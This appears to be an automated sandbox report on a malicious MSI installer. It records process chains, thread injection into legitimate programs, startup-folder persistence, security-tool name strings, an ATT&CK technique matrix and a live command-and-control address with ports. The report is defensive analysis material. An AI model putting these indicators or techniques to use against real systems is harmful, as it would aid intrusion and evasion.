            Source: C:\ProgramData\fkeabad\Autoit3.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exeJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeProcess created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeProcess created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exeJump to behavior
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004685000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004474000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.565469736.0000000000A36000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerabad\V
            Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager8.6
            Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.763757164.0000000000732000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerST
            Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.617261525.00000000063BE000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820550875.000000000972E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerkeabad
            Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerabad\
            Source: Autoit3.exe, 00000008.00000002.566996482.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.568412536.0000000004958000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.566222341.0000000001337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: cmd.exe, 00000009.00000002.617175946.000000000627E000.00000004.00000010.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.617463634.000000000693E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Managerifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com
            Source: cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerVGg
            Source: SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.763757164.0000000000732000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerkeabad;
            Source: SciTE.exe, 00000018.00000002.820550875.000000000972E000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820725792.0000000009CAE000.00000004.00000010.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820504444.00000000095EE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tProgram Manager
            Source: cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerVG
            Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program manager
            Source: cmd.exe, 00000009.00000003.580764198.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614013393.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.582186478.00000000033E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerisoft
            Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program manager<
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeCode function: RegOpenKeyExA,GetLocaleInfoA,LoadLibraryExA,LoadLibraryExA,9_2_00405D90
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00451190 GetUserNameA,9_2_00451190
            Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
            Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: superantispyware.exe
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00428120 bind,9_2_00428120

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            1
            Replication Through Removable Media            		Windows Management Instrumentation1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            Input Capture            		11
            Peripheral Device Discovery            		1
            Replication Through Removable Media            		1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/Job2
            Registry Run Keys / Startup Folder            		112
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            Account Discovery            		Remote Desktop Protocol1
            Input Capture            		Exfiltration Over Bluetooth1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)1
            Services File Permissions Weakness            		2
            Registry Run Keys / Startup Folder            		2
            Obfuscated Files or Information            		Security Account Manager4
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
            Non-Standard Port            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)1
            Services File Permissions Weakness            		1
            DLL Side-Loading            		NTDS44
            System Information Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer1
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            File Deletion            		LSA Secrets111
            Security Software Discovery            		SSHKeyloggingData Transfer Size Limits11
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common21
            Masquerading            		Cached Domain Credentials21
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items21
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job112
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Services File Permissions Weakness            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1280109 Sample: 15e7232gfN.msi Startdate: 26/07/2023 Architecture: WINDOWS Score: 64 67 Multi AV Scanner detection for domain / URL 2->67 69 Connects to many ports of the same IP (likely port scanning) 2->69 71 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->71 73 Uses known network protocols on non-standard ports 2->73 9 msiexec.exe 3 16 2->9         started        12 Autoit3.exe 2->12         started        14 msiexec.exe 5 2->14         started        16 8 other processes 2->16 process3 file4 61 C:\Windows\Installer\MSIDAD.tmp, PE32 9->61 dropped 63 C:\Windows\Installer\MSI3433.tmp, PE32 9->63 dropped 18 msiexec.exe 5 9->18         started        20 cmd.exe 12->20         started        process5 signatures6 23 Autoit3.exe 1 7 18->23         started        26 expand.exe 5 18->26         started        28 icacls.exe 1 18->28         started        30 icacls.exe 1 18->30         started        75 Creates a thread in another existing process (thread injection) 20->75 32 SciTE.exe 1 20->32         started        34 MyProg.exe 20->34         started        36 ADelRCP.exe 20->36         started        process7 file8 53 C:\temp\AutoIt3.exe, PE32 23->53 dropped 38 cmd.exe 3 23->38         started        55 C:\Users\user\AppData\...\Autoit3.exe (copy), PE32 26->55 dropped 57 C:\...\4d7bae1ad8a0f940a33036ae38ff0554.tmp, PE32 26->57 dropped 43 conhost.exe 26->43         started        45 conhost.exe 28->45         started        47 conhost.exe 30->47         started        49 msinfo32.exe 32->49         started        process9 dnsIp10 65 80.66.88.145, 49690, 49691, 49692 RISS-ASRU Russian Federation 38->65 59 C:\ProgramData\fkeabad\Autoit3.exe, PE32 38->59 dropped 77 Creates a thread in another existing process (thread injection) 38->77 51 OLicenseHeartbeat.exe 38->51         started        file11 signatures12 process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            15e7232gfN.msi2%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData\fkeabad\Autoit3.exe3%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\4d7bae1ad8a0f940a33036ae38ff0554.tmp3%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe (copy)3%ReversingLabs
            C:\Windows\Installer\MSI3433.tmp0%ReversingLabs
            C:\Windows\Installer\MSIDAD.tmp0%ReversingLabs
            C:\temp\AutoIt3.exe3%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://80.66.88.145:9999d0%Avira URL Cloudsafe
            http://80.66.88.145&0%Avira URL Cloudsafe
            http://80.66.88.145:7891/6%VirustotalBrowse
            http://80.66.88.145:9999n0%Avira URL Cloudsafe
            http://80.66.88.145:9999l0%Avira URL Cloudsafe
            http://80.66.88.1457%VirustotalBrowse
            http://80.66.88.1450%Avira URL Cloudsafe
            http://80.66.88.0%Avira URL Cloudsafe
            http://80.66.88.145:7891/0%Avira URL Cloudsafe
            http://80.66.88.145:9999pT$0%Avira URL Cloudsafe
            http://80.66.88.145:99990%Avira URL Cloudsafe
            http://80.66.88.145:78910%Avira URL Cloudsafe
            http://80.66.88.145:9999x0%Avira URL Cloudsafe
            http://80.66.88.145:9999hd0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://80.66.88.145:7891/true
            • 6%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://80.66.88.145cmd.exe, 0000000E.00000002.708417301.000000000517B000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpfalse
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.autoitscript.com/autoit3/JAutoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000000.557064508.0000000000A49000.00000002.00000001.01000000.00000007.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000000.589433696.0000000000F59000.00000002.00000001.01000000.0000000B.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://80.66.88.145:9999dSciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              http://80.66.88.145&Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              http://80.66.88.145:9999SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://80.66.88.145:9999nSciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              http://80.66.88.145:9999lcmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              http://80.66.88.SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              https://www.autoitscript.com/autoit3/Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                http://80.66.88.145:7891cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://80.66.88.145:9999pT$cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://80.66.88.145:9999xcmd.exe, 00000009.00000002.616707929.0000000005B00000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://80.66.88.145:9999hdSciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                80.66.88.145
                		unknownRussian Federation
                		20803RISS-ASRUtrue

                General Information

                Joe Sandbox Version:38.0.0 Beryl
                Analysis ID:1280109
                Start date and time:2023-07-26 13:59:55 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 38s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:27
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:15e7232gfN.msi
                Original Sample Name:6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70.msi
                Detection:MAL
                Classification:mal64.troj.evad.winMSI@51/27@0/1
                EGA Information:
                • Successful, ratio: 50%
                HDC Information:
                • Successful, ratio: 99.9% (good quality ratio 97.3%)
                • Quality average: 78.9%
                • Quality standard deviation: 27.2%
                HCA Information:
                • Successful, ratio: 97%
                • Number of executed functions: 24
                • Number of non-executed functions: 11
                Cookbook Comments:
                • Found application associated with file extension: .msi
                • Close Viewer

                Warnings

                • Exclude process from analysis (whitelisted): audiodg.exe
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtWriteVirtualMemory calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                14:01:03API Interceptor4x Sleep call for process: Autoit3.exe modified
                14:01:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk
                14:01:08API Interceptor13x Sleep call for process: cmd.exe modified
                14:02:03API Interceptor35x Sleep call for process: SciTE.exe modified
                14:02:27API Interceptor1x Sleep call for process: MyProg.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                80.66.88.145no_halt_7891.msiGet hashmaliciousUnknownBrowse
                • 80.66.88.145:7891/
                no_halt_7891.msiGet hashmaliciousUnknownBrowse
                • 80.66.88.145:7891/

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                RISS-ASRUno_halt_7891.msiGet hashmaliciousUnknownBrowse
                • 80.66.88.145
                no_halt_7891.msiGet hashmaliciousUnknownBrowse
                • 80.66.88.145
                Gsismkswcbe.cmd.exe.batGet hashmaliciousUnknownBrowse
                • 80.66.75.172
                file.exeGet hashmaliciousTofseeBrowse
                • 80.66.75.254
                no_halt_opts_enabled.msiGet hashmaliciousUnknownBrowse
                • 80.66.88.145
                no_halt_opts_enabled.msiGet hashmaliciousUnknownBrowse
                • 80.66.88.145
                jQq9HLW8XQ.exeGet hashmaliciousCryptOne, RemcosBrowse
                • 80.66.75.172
                file.exeGet hashmaliciousTofseeBrowse
                • 80.66.75.254
                http://80.66.75.37/rxtygf.exeGet hashmaliciousUnknownBrowse
                • 80.66.75.37
                5MYFRkQgfM.exeGet hashmaliciousTofseeBrowse
                • 80.66.75.254
                kfxuza.batGet hashmaliciousRemcosBrowse
                • 80.66.75.116
                Xecgqu.exeGet hashmaliciousUnknownBrowse
                • 80.66.75.37
                Bxbnmjpq.exeGet hashmaliciousUnknownBrowse
                • 80.66.75.37
                SecuriteInfo.com.Win32.RansomX-gen.11180.14760.exeGet hashmaliciousUnknownBrowse
                • 80.66.75.37
                file.exeGet hashmaliciousTofseeBrowse
                • 80.66.75.254
                file.exeGet hashmaliciousTofseeBrowse
                • 80.66.75.254
                file.exeGet hashmaliciousTofseeBrowse
                • 80.66.75.254
                w3exo8I4Tb.exeGet hashmaliciousTofseeBrowse
                • 80.66.75.254
                file.exeGet hashmaliciousTofseeBrowse
                • 80.66.75.254
                file.exeGet hashmaliciousTofseeBrowse
                • 80.66.75.254

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\ProgramData\fkeabad\Autoit3.exexIgS6K1nPs.rtfGet hashmaliciousUnknownBrowse
                  no_halt_7891.msiGet hashmaliciousUnknownBrowse
                    no_halt_7891.msiGet hashmaliciousUnknownBrowse
                      no_halt_opts_enabled.msiGet hashmaliciousUnknownBrowse
                        no_halt_opts_enabled.msiGet hashmaliciousUnknownBrowse
